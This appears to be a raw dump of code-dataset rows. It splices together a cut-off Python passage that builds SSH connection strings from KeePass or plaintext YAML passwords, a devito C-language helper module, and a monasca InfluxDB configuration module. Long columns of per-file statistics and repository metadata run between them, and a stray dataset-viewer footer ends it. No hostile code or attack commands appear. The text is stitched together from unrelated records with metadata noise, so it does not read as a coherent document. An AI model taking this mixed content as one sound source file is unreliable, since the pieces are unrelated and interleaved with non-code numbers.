    underlying KeePass lookup fails (the module-level ``get_password``
    helper's exception propagates unchanged; the old catch-and-re-raise
    was a no-op and has been removed).
    """
    if self.master is None:
        raise KeePassError("Master Password Not Set")
    # NOTE: this calls the *module-level* get_password function, which this
    # method intentionally shadows by name.
    keepass_path = common.keepass_path
    return get_password(keepass_path, self.master, alias)
def connect_command_builder(self, connection, perm):
    """Build the underscore-separated connection command string.

    Format: ``adress_user_password_sshport_remoteport_perm``.  The
    password comes from KeePass (via the 'keepass' alias) when possible;
    otherwise the plain 'passwd' entry is used as a fallback.

    Raises KeePassError when neither source can supply a password or the
    connection mapping lacks required keys.  (The original trailing
    ``raise KeePassError(e1)`` was unreachable — both branches above it
    raise — and has been removed; the duplicated string construction is
    now factored into one helper.)
    """
    def _build(password):
        # Single place for the command format used by both password sources.
        return (connection["adress"] + "_" + connection["user"] + "_" +
                password + "_" + str(connection["sshport"]) + "_" +
                str(connection["remoteport"]) + "_" + perm)

    try:
        return _build(self.get_password(connection["keepass"]))
    except (KeyError, KeePassError) as e1:
        # Fall back to a plaintext password stored in the yaml config.
        try:
            return _build(connection["passwd"])
        except KeyError:
            if isinstance(e1, KeePassError):
                raise KeePassError("Unable to use Keepass(" + e1.value + ") or Password")
            raise KeePassError("Invalid connection in yaml file")
| 29.512915
| 132
| 0.635159
| 1,039
| 7,998
| 4.805582
| 0.256015
| 0.006008
| 0.01442
| 0.016223
| 0.286
| 0.276387
| 0.231925
| 0.187863
| 0.175446
| 0.175446
| 0
| 0.0048
| 0.218555
| 7,998
| 271
| 133
| 29.512915
| 0.79408
| 0.147162
| 0
| 0.348416
| 0
| 0
| 0.102377
| 0.005542
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081448
| false
| 0.072398
| 0.036199
| 0.013575
| 0.180995
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
e0201884251a727105b3a8b3946ca3bc3aefd73d
| 480
|
py
|
Python
|
devito/passes/iet/languages/C.py
|
guaacoelho/devito
|
7e0b873114675752c4a49ed9076ee5d52997833c
|
[
"MIT"
] | 199
|
2016-08-18T23:33:05.000Z
|
2019-12-24T07:08:48.000Z
|
devito/passes/iet/languages/C.py
|
guaacoelho/devito
|
7e0b873114675752c4a49ed9076ee5d52997833c
|
[
"MIT"
] | 949
|
2016-04-25T11:41:34.000Z
|
2019-12-27T10:43:40.000Z
|
devito/passes/iet/languages/C.py
|
guaacoelho/devito
|
7e0b873114675752c4a49ed9076ee5d52997833c
|
[
"MIT"
] | 78
|
2016-08-30T07:42:34.000Z
|
2019-12-13T20:34:45.000Z
|
from devito.ir import Call
from devito.passes.iet.definitions import DataManager
from devito.passes.iet.langbase import LangBB
# Public API of this module.
__all__ = ['CBB', 'CDataManager']
class CBB(LangBB):
    """Language building blocks for plain C."""

    mapper = {
        # Alignment attribute for declarations (argument is the byte count).
        'aligned': lambda nbytes:
            '__attribute__((aligned(%d)))' % nbytes,
        # Aligned host-side allocation and its release.
        'host-alloc': lambda memptr, alignment, nbytes:
            Call('posix_memalign', (memptr, alignment, nbytes)),
        'host-free': lambda ptr:
            Call('free', (ptr,)),
    }
class CDataManager(DataManager):
    # Data-management pass specialized for the plain-C language bindings.
    lang = CBB
| 21.818182
| 53
| 0.591667
| 57
| 480
| 4.824561
| 0.508772
| 0.109091
| 0.116364
| 0.138182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.260417
| 480
| 21
| 54
| 22.857143
| 0.774648
| 0
| 0
| 0
| 0
| 0
| 0.18125
| 0.058333
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.133333
| 0.2
| 0
| 0.466667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
e0404632a7378b088279de3e94aac11c26a9e183
| 1,540
|
py
|
Python
|
monasca_persister/conf/influxdb.py
|
zhangjianweibj/monasca-persister
|
0c5d8a7c5553001f2d38227347f482201f92c8e1
|
[
"Apache-2.0"
] | null | null | null |
monasca_persister/conf/influxdb.py
|
zhangjianweibj/monasca-persister
|
0c5d8a7c5553001f2d38227347f482201f92c8e1
|
[
"Apache-2.0"
] | 1
|
2020-03-13T12:30:29.000Z
|
2020-03-13T12:38:16.000Z
|
monasca_persister/conf/influxdb.py
|
zhangjianweibj/monasca-persister
|
0c5d8a7c5553001f2d38227347f482201f92c8e1
|
[
"Apache-2.0"
] | null | null | null |
# (C) Copyright 2016-2017 Hewlett Packard Enterprise Development LP
# Copyright 2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
# oslo.config options for the InfluxDB metrics repository.
influxdb_opts = [
    cfg.StrOpt('database_name',
               help='database name where metrics are stored',
               default='mon'),
    cfg.HostAddressOpt('ip_address',
                       help='Valid IP address or hostname '
                            'to InfluxDB instance'),
    cfg.PortOpt('port',
                help='port to influxdb',
                default=8086),
    cfg.StrOpt('user',
                help='influxdb user ',
                default='mon_persister'),
    cfg.StrOpt('password',
                secret=True,
                help='influxdb password')]
# Option group under which all of the above are registered.
influxdb_group = cfg.OptGroup(name='influxdb',
                              title='influxdb')
def register_opts(conf):
    """Register the influxdb option group and its options on *conf*."""
    conf.register_group(influxdb_group)
    conf.register_opts(influxdb_opts, influxdb_group)
def list_opts():
    """Return (group, opts) for oslo.config option discovery."""
    return influxdb_group, influxdb_opts
| 32.765957
| 69
| 0.653896
| 190
| 1,540
| 5.221053
| 0.573684
| 0.060484
| 0.02621
| 0.032258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017544
| 0.25974
| 1,540
| 46
| 70
| 33.478261
| 0.852632
| 0.398701
| 0
| 0
| 0
| 0
| 0.225275
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0.083333
| 0.041667
| 0.041667
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.